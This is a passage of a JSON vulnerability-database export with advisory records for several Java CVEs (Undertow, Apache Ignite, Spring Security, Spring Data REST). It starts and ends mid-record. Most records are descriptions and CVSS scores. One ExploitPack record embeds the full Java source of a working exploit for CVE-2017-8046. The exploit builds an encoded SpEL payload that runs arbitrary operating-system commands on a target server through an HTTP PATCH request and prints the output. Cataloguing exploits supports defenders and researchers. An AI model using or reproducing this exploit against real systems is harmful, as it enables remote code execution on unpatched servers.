this product is unrelated to Ignite Realtime Spark.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2018-10-19T16:56:00", "type": "osv", "title": "Moderate severity vulnerability that affects com.sparkjava:spark-core", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-9159"], "modified": "2022-08-15T08:53:35", "id": "OSV:GHSA-76QR-MMH8-CP8F", "href": "https://osv.dev/vulnerability/GHSA-76qr-mmh8-cp8f", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-16T03:32:42", "description": "Undertow before versions 1.4.18.SP1 (not findable in Maven), 2.0.2.Final, and 1.4.24.Final was found vulnerable when using Digest authentication, the server does not ensure that the value of URI in the Authorization header matches the URI in HTTP request line. This allows the attacker to cause a MITM attack and access the desired content on the server.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-05-13T01:38:10", "type": "osv", "title": "Incorrect Authorization in Undertow", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12196"], "modified": "2022-08-16T03:32:40", "id": "OSV:GHSA-CP7V-VMV7-6X2Q", "href": "https://osv.dev/vulnerability/GHSA-cp7v-vmv7-6x2q", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-15T08:07:23", "description": "In Apache Ignite 2.3 or earlier, the serialization mechanism does not have a list of classes allowed for serialization/deserialization, which makes it possible to run arbitrary code when 3-rd party vulnerable classes are present in Ignite classpath. The vulnerability can be exploited if the one sends a specially prepared form of a serialized object to one of the deserialization endpoints of some Ignite components - discovery SPI, Ignite persistence, Memcached endpoint, socket steamer.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-10-16T20:53:44", "type": "osv", "title": "Apache serialization mechanism does not have a list of classes allowed for serialization/deserialization", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1295"], "modified": "2022-08-15T08:05:37", "id": "OSV:GHSA-CHP4-RV79-68J3", "href": "https://osv.dev/vulnerability/GHSA-chp4-rv79-68j3", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-15T08:58:57", "description": "Spring Security (Spring Security 4.1.x before 4.1.5, 4.2.x before 4.2.4, and 5.0.x before 5.0.1; and Spring Framework 4.3.x before 4.3.14 and 5.0.x before 5.0.3) does not consider URL path parameters when processing security constraints. By adding a URL path parameter with special encodings, an attacker may be able to bypass a security constraint. The root cause of this issue is a lack of clarity regarding the handling of path parameters in the Servlet Specification. Some Servlet containers include path parameters in the value returned for getPathInfo() and some do not. Spring Security uses the value returned by getPathInfo() as part of the process of mapping requests to security constraints. In this particular attack, different character encodings used in path parameters allows secured Spring MVC static resource URLs to be bypassed.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2018-10-17T20:01:54", "type": "osv", "title": "Improper Input Validation in org.springframework.security:spring-security-core, org.springframework.security:spring-security-core , and org.springframework:spring-core", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1199"], "modified": "2022-08-15T08:58:51", "id": "OSV:GHSA-V596-FWHQ-8X48", "href": "https://osv.dev/vulnerability/GHSA-v596-fwhq-8x48", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "ubuntucve": [{"lastseen": "2022-08-04T13:50:22", "description": "undertow before versions 1.4.18.SP1, 2.0.2.Final, 1.4.24.Final was found\nvulnerable when using Digest authentication, the server does not ensure\nthat the value of URI in the Authorization header matches the URI in HTTP\nrequest line. This allows the attacker to cause a MITM attack and access\nthe desired content on the server.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-04-18T00:00:00", "type": "ubuntucve", "title": "CVE-2017-12196", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12196"], "modified": "2018-04-18T00:00:00", "id": "UB:CVE-2017-12196", "href": "https://ubuntu.com/security/CVE-2017-12196", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-04T13:51:21", "description": "Spring Security (Spring Security 4.1.x before 4.1.5, 4.2.x before 4.2.4,\nand 5.0.x before 5.0.1; and Spring Framework 4.3.x before 4.3.14 and 5.0.x\nbefore 5.0.3) does not consider URL path parameters when processing\nsecurity constraints. By adding a URL path parameter with special\nencodings, an attacker may be able to bypass a security constraint. The\nroot cause of this issue is a lack of clarity regarding the handling of\npath parameters in the Servlet Specification. Some Servlet containers\ninclude path parameters in the value returned for getPathInfo() and some do\nnot. Spring Security uses the value returned by getPathInfo() as part of\nthe process of mapping requests to security constraints. In this particular\nattack, different character encodings used in path parameters allows\nsecured Spring MVC static resource URLs to be bypassed.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2018-03-16T00:00:00", "type": "ubuntucve", "title": "CVE-2018-1199", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1199"], "modified": "2018-03-16T00:00:00", "id": "UB:CVE-2018-1199", "href": "https://ubuntu.com/security/CVE-2018-1199", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "debiancve": [{"lastseen": "2022-08-18T18:03:09", "description": "undertow before versions 1.4.18.SP1, 2.0.2.Final, 1.4.24.Final was found vulnerable when using Digest authentication, the server does not ensure that the value of URI in the Authorization header matches the URI in HTTP request line. This allows the attacker to cause a MITM attack and access the desired content on the server.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-04-18T01:29:00", "type": "debiancve", "title": "CVE-2017-12196", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12196"], "modified": "2018-04-18T01:29:00", "id": "DEBIANCVE:CVE-2017-12196", "href": "https://security-tracker.debian.org/tracker/CVE-2017-12196", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-07-04T06:00:27", "description": "Spring Security (Spring Security 4.1.x before 4.1.5, 4.2.x before 4.2.4, and 5.0.x before 5.0.1; and Spring Framework 4.3.x before 4.3.14 and 5.0.x before 5.0.3) does not consider URL path parameters when processing security constraints. By adding a URL path parameter with special encodings, an attacker may be able to bypass a security constraint. The root cause of this issue is a lack of clarity regarding the handling of path parameters in the Servlet Specification. Some Servlet containers include path parameters in the value returned for getPathInfo() and some do not. Spring Security uses the value returned by getPathInfo() as part of the process of mapping requests to security constraints. In this particular attack, different character encodings used in path parameters allows secured Spring MVC static resource URLs to be bypassed.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2018-03-16T20:29:00", "type": "debiancve", "title": "CVE-2018-1199", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-1199"], "modified": "2018-03-16T20:29:00", "id": "DEBIANCVE:CVE-2018-1199", "href": "https://security-tracker.debian.org/tracker/CVE-2018-1199", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:32:59", "description": "A remote code execution vulnerability exists in Pivotal Spring Data REST. The vulnerability is due to insufficient validation of user supplied input. A remote attacker can exploit this vulnerability to execute arbitrary code on the affected server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-11-09T00:00:00", "type": "checkpoint_advisories", "title": "Pivotal Spring PATCH Request Remote Code Execution (CVE-2017-8046)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8046"], "modified": "2017-11-09T00:00:00", "id": "CPAI-2017-0924", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:49", "description": "\nSpring Data REST 2.6.9 (Ingalls SR9) 3.0.1 (Kay SR1) - PATCH Request Remote Code Execution", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-03-15T00:00:00", "title": "Spring Data REST 2.6.9 (Ingalls SR9) 3.0.1 (Kay SR1) - PATCH Request Remote Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-8046"], "modified": "2018-03-15T00:00:00", "id": "EXPLOITPACK:6A15F7602A67FE4C967F250A6203D868", "href": "", "sourceData": "// Exploit Title: RCE in PATCH requests in Spring Data REST\n// Date: 2018-03-10\n// Exploit Author: Antonio Francesco Sardella\n// Vendor Homepage: https://pivotal.io/\n// Software Link: https://projects.spring.io/spring-data-rest/\n// Version: Spring Data REST versions prior to 2.6.9 (Ingalls SR9), 3.0.1 (Kay SR1)\n// Tested on: 'Microsoft Windows 7' and 'Xubuntu 17.10.1' with 'spring-boot-starter-data-rest' version '1.5.6.RELEASE'\n// CVE: CVE-2017-8046\n// Category: Webapps\n// Repository: https://github.com/m3ssap0/spring-break_cve-2017-8046\n// Example Vulnerable Application: https://github.com/m3ssap0/SpringBreakVulnerableApp\n// Vulnerability discovered and reported by: Man Yue Mo from Semmle and lgtm.com\n\npackage com.afs.exploit.spring;\n\nimport java.io.BufferedReader;\nimport java.io.IOException;\nimport java.io.InputStreamReader;\nimport java.net.URI;\nimport java.net.URISyntaxException;\n\nimport org.apache.http.HttpResponse;\nimport org.apache.http.client.HttpClient;\nimport org.apache.http.client.methods.HttpPatch;\nimport org.apache.http.entity.StringEntity;\nimport org.apache.http.impl.client.HttpClientBuilder;\n\n/**\n * This is a Java program that exploits Spring Break vulnerability (CVE-2017-8046).\n * This software is written to have as less external dependencies as possible.\n * DISCLAIMER: This tool is intended for security engineers and appsec guys for security assessments. Please\n * use this tool responsibly. I do not take responsibility for the way in which any one uses this application.\n * I am NOT responsible for any damages caused or any crimes committed by using this tool.\n * ..................\n * . CVE-ID ........: CVE-2017-8046\n * . Link ..........: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8046\n * . Description ...: Malicious PATCH requests submitted to spring-data-rest servers in Pivotal Spring Data REST\n * .................. versions prior to 2.5.12, 2.6.7, 3.0 RC3, Spring Boot versions prior to 2.0.0M4, and Spring\n * .................. Data release trains prior to Kay-RC3 can use specially crafted JSON data to run arbitrary\n * .................. Java code.\n * ..................\n * \n * @author Antonio Francesco Sardella\n */\npublic class SpringBreakCve20178046 {\n\n /**\n * Version string.\n */\n private static final String VERSION = \"v1.0 (2018-03-10)\";\n\n /**\n * The JSON Patch object.\n */\n private static String JSON_PATCH_OBJECT = \"[{ \\\"op\\\" : \\\"replace\\\", \\\"path\\\" : \\\"%s\\\", \\\"value\\\" : \\\"pwned\\\" }]\";\n\n /**\n * This is a way to bypass the split and 'replace'\n * logic performed by the framework on slashes.\n */\n private static String SLASH = \"T(java.lang.String).valueOf(T(java.lang.Character).toChars(0x2F))\";\n\n /**\n * Used to encode chars.\n */\n private static String CHAR_ENCODING = \"T(java.lang.Character).toChars(%d)[0]\";\n\n /**\n * Malicious payload.\n */\n private static String PAYLOAD;\n\n /**\n * Malicious payload initialization.\n */\n static {\n PAYLOAD = \"T(org.springframework.util.StreamUtils).copy(\";\n PAYLOAD += \"T(java.lang.Runtime).getRuntime().exec(\";\n PAYLOAD += \"(\";\n PAYLOAD += \"T(java.lang.System).getProperty(\\\\\\\"os.name\\\\\\\").toLowerCase().contains(\\\\\\\"win\\\\\\\")\";\n PAYLOAD += \"?\";\n PAYLOAD += \"\\\\\\\"cmd \\\\\\\"+\" + SLASH + \"+\\\\\\\"c \\\\\\\"\";\n PAYLOAD += \":\";\n PAYLOAD += \"\\\\\\\"\\\\\\\"\";\n PAYLOAD += \")+\";\n PAYLOAD += \"%s\"; // The encoded command will be placed here.\n PAYLOAD += \").getInputStream()\";\n PAYLOAD += \",\";\n PAYLOAD += \"T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes()\";\n PAYLOAD += \".getResponse().getOutputStream()\";\n PAYLOAD += \").x\";\n }\n\n /**\n * Error cause string that can be used to \"clean the response.\"\n */\n private static String ERROR_CAUSE = \"{\\\"cause\";\n\n /**\n * The target URL.\n */\n private URI url;\n\n /**\n * The command that will be executed on the remote machine.\n */\n private String command;\n\n /**\n * Cookies that will be passed.\n */\n private String cookies;\n\n /**\n * Flag used to remove error messages in output due to\n * the usage of the exploit. It could hide error messages\n * if the request fails for other reasons.\n */\n private boolean cleanResponse;\n\n /**\n * Verbosity flag.\n */\n private boolean verbose;\n\n /**\n * Default constructor.\n */\n public SpringBreakCve20178046() {\n this.verbose = false;\n this.cleanResponse = false;\n }\n\n /**\n * Performs the exploit.\n * \n * @throws IOException\n * If something bad occurs during HTTP GET.\n */\n public void exploit() throws IOException {\n checkInput();\n printInput();\n String payload = preparePayload();\n String response = httpPatch(payload);\n printOutput(response);\n }\n\n /**\n * Checks the input.\n */\n private void checkInput() {\n if (this.url == null) {\n throw new IllegalArgumentException(\"URL must be passed.\");\n }\n\n if (isEmpty(this.command)) {\n throw new IllegalArgumentException(\"Command must be passed.\");\n }\n }\n\n /**\n * Prints input if verbose flag is true.\n */\n private void printInput() {\n if (isVerbose()) {\n System.out.println(\"[*] Target URL ........: \" + this.url);\n System.out.println(\"[*] Command ...........: \" + this.command);\n System.out.println(\"[*] Cookies ...........: \" + (isEmpty(this.cookies) ? \"(no cookies)\" : this.cookies));\n }\n }\n\n /**\n * Prepares the payload.\n * \n * @return The malicious payload that will be injected.\n */\n private String preparePayload() {\n System.out.println(\"[*] Preparing payload.\");\n\n String command = encodingCommand(); // Encoding inserted command.\n String payload = String.format(PAYLOAD, command); // Preparing Java payload.\n payload = String.format(JSON_PATCH_OBJECT, payload); // Placing payload into JSON Patch object.\n\n if (isVerbose()) {\n System.out.println(\"[*] Payload ...........: \" + payload);\n }\n\n return payload;\n }\n\n /**\n * Encodes the inserted command.\n * PROS: No problems in interpreting things.\n * CONS: Payload too long.\n * \n * @return The encoded command.\n */\n private String encodingCommand() {\n StringBuffer encodedCommand = new StringBuffer(\"T(java.lang.String).valueOf(new char[]{\");\n\n int commandLength = this.command.length();\n for (int i = 0; i < commandLength; i++) {\n encodedCommand.append(String.format(CHAR_ENCODING, (int) this.command.charAt(i)));\n if (i + 1 < commandLength) {\n encodedCommand.append(\",\");\n }\n }\n\n encodedCommand.append(\"})\");\n\n if (isVerbose()) {\n System.out.println(\"[*] Encoded command ...: \" + encodedCommand.toString());\n }\n\n return encodedCommand.toString();\n }\n\n /**\n * HTTP PATCH operation on the target passing the malicious payload.\n * \n * @param payload\n * The malicious payload.\n * @return The response as a string.\n * @throws IOException\n * If something bad occurs during HTTP GET.\n */\n private String httpPatch(String payload) throws IOException {\n System.out.println(\"[*] Sending payload.\");\n\n // Preparing PATCH operation.\n HttpClient client = HttpClientBuilder.create().build();\n HttpPatch patch = new HttpPatch(this.url);\n patch.setHeader(\"User-Agent\", \"Mozilla/5.0\");\n patch.setHeader(\"Accept-Language\", \"en-US,en;q=0.5\");\n patch.setHeader(\"Content-Type\", \"application/json-patch+json\"); // This is a JSON Patch.\n if (!isEmpty(this.cookies)) {\n patch.setHeader(\"Cookie\", this.cookies);\n }\n patch.setEntity(new StringEntity(payload));\n\n // Response string.\n StringBuffer response = new StringBuffer();\n\n // Executing PATCH operation.\n HttpResponse httpResponse = client.execute(patch);\n if (httpResponse != null) {\n\n // Reading response code.\n if (httpResponse.getStatusLine() != null) {\n int responseCode = httpResponse.getStatusLine().getStatusCode();\n System.out.println(\"[*] HTTP \" + responseCode);\n } else {\n System.out.println(\"[!] HTTP response code can't be read.\");\n }\n\n // Reading response content.\n if (httpResponse.getEntity() != null && httpResponse.getEntity().getContent() != null) {\n BufferedReader in = new BufferedReader(new InputStreamReader(httpResponse.getEntity().getContent()));\n String inputLine;\n\n while ((inputLine = in.readLine()) != null) {\n response.append(inputLine);\n response.append(System.getProperty(\"line.separator\"));\n }\n in.close();\n } else {\n System.out.println(\"[!] HTTP response content can't be read.\");\n }\n\n } else {\n System.out.println(\"[!] HTTP response is null.\");\n }\n\n return response.toString();\n }\n\n /**\n * Prints output.\n * \n * @param response\n * Response that will be printed.\n */\n private void printOutput(String response) {\n if (!isEmpty(response)) {\n System.out.println(\"[*] vvv Response vvv\");\n\n // Cleaning response (if possible).\n if (isCleanResponse() && response.contains(ERROR_CAUSE)) {\n String cleanedResponse = response.split(\"\\\\\" + ERROR_CAUSE)[0];\n System.out.println(cleanedResponse);\n } else {\n System.out.println(response);\n }\n\n System.out.println(\"[*] ^^^ ======== ^^^\");\n }\n }\n\n /**\n * Checks if an input string is null/empty or not.\n * \n * @param input\n * The input string to check.\n * @return True if the string is null or empty, false otherwise.\n */\n private boolean isEmpty(String input) {\n boolean isEmpty;\n\n if (input == null || input.trim().length() < 1) {\n isEmpty = true;\n } else {\n isEmpty = false;\n }\n\n return isEmpty;\n }\n\n /* Getters and setters. */\n\n public boolean isVerbose() {\n return verbose;\n }\n\n public void setVerbose(boolean verbose) {\n this.verbose = verbose;\n }\n\n public void setUrl(String url) throws URISyntaxException {\n if (isEmpty(url)) {\n throw new IllegalArgumentException(\"URL must be not null and not empty.\");\n }\n\n this.url = new URI(url.trim());\n }\n\n public void setCommand(String command) {\n if (isEmpty(command)) {\n throw new IllegalArgumentException(\"Command must be not null and not empty.\");\n }\n\n this.command = command.trim();\n }\n\n public void setCookies(String cookies) {\n if (cookies != null) {\n cookies = cookies.trim();\n }\n\n this.cookies = cookies;\n }\n\n public boolean isCleanResponse() {\n return cleanResponse;\n }\n\n public void setCleanResponse(boolean cleanResponse) {\n this.cleanResponse = cleanResponse;\n }\n\n /**\n * Shows the program help.\n */\n public static final void help() {\n System.out.println(\"Usage:\");\n System.out.println(\" java -jar spring-break_cve-2017-8046.jar [options]\");\n System.out.println(\"Description:\");\n System.out.println(\" Exploiting 'Spring Break' Remote Code Execution (CVE-2017-8046).\");\n System.out.println(\"Options:\");\n System.out.println(\" -h, --help\");\n System.out.println(\" Prints this help and exits.\");\n System.out.println(\" -u, --url [target_URL]\");\n System.out.println(\" The target URL where the exploit will be performed.\");\n System.out.println(\" You have to choose an existent resource.\");\n System.out.println(\" -cmd, --command [command_to_execute]\");\n System.out.println(\" The command that will be executed on the remote machine.\");\n System.out.println(\" --cookies [cookies]\");\n System.out.println(\" Optional. Cookies passed into the request, e.g. authentication cookies.\");\n System.out.println(\" --clean\");\n System.out.println(\" Optional. Removes error messages in output due to the usage of the\");\n System.out.println(\" exploit. It could hide error messages if the request fails for other reasons.\");\n System.out.println(\" -v, --verbose\");\n System.out.println(\" Optional. Increase verbosity.\");\n }\n\n /**\n * Main method.\n * \n * @param args\n * Input arguments\n */\n public static void main(String[] args) {\n try {\n System.out.println(\"'Spring Break' RCE (CVE-2017-8046) - \" + VERSION);\n SpringBreakCve20178046 o = new SpringBreakCve20178046();\n\n if (args.length > 0) {\n for (int i = 0; i < args.length; i++) {\n\n String p = args[i];\n\n if ((\"-h\".equals(p) || \"--help\".equals(p)) && i == 0) {\n SpringBreakCve20178046.help();\n return;\n } else if (\"-u\".equals(p) || \"--url\".equals(p)) {\n\n if (i + 1 > args.length - 1) {\n throw new IllegalArgumentException(\"URL must be passed.\");\n }\n o.setUrl(args[++i]);\n\n } else if (\"-cmd\".equals(p) || \"--command\".equals(p)) {\n\n if (i + 1 > args.length - 1) {\n throw new IllegalArgumentException(\"Command must be passed.\");\n }\n o.setCommand(args[++i]);\n\n } else if (\"--cookies\".equals(p)) {\n\n if (i + 1 > args.length - 1) {\n throw new IllegalArgumentException(\"Cookies must be passed, if specified.\");\n }\n o.setCookies(args[++i]);\n\n } else if (\"--clean\".equals(p)) {\n o.setCleanResponse(true);\n } else if (\"-v\".equals(p) || \"--verbose\".equals(p)) {\n o.setVerbose(true);\n }\n\n }\n\n // Performing the exploit.\n o.exploit();\n\n } else { // Wrong number of arguments.\n SpringBreakCve20178046.help();\n return;\n }\n\n } catch (URISyntaxException use) {\n System.out.println(\"[!] Input error (URI syntax exception): \" + use.getMessage());\n } catch (IllegalArgumentException iae) {\n System.out.println(\"[!] Input error (illegal argument): \" + iae.getMessage());\n } catch (Exception e) {\n System.out.println(\"[!] Unexpected exception: \" + e.getMessage());\n e.printStackTrace();\n }\n }\n\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2018-03-23T01:30:25", "description": "", "cvss3": {}, "published": "2018-03-15T00:00:00", "type": "packetstorm", "title": "Spring Data REST PATCH Request Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-8046"], "modified": "2018-03-15T00:00:00", "id": 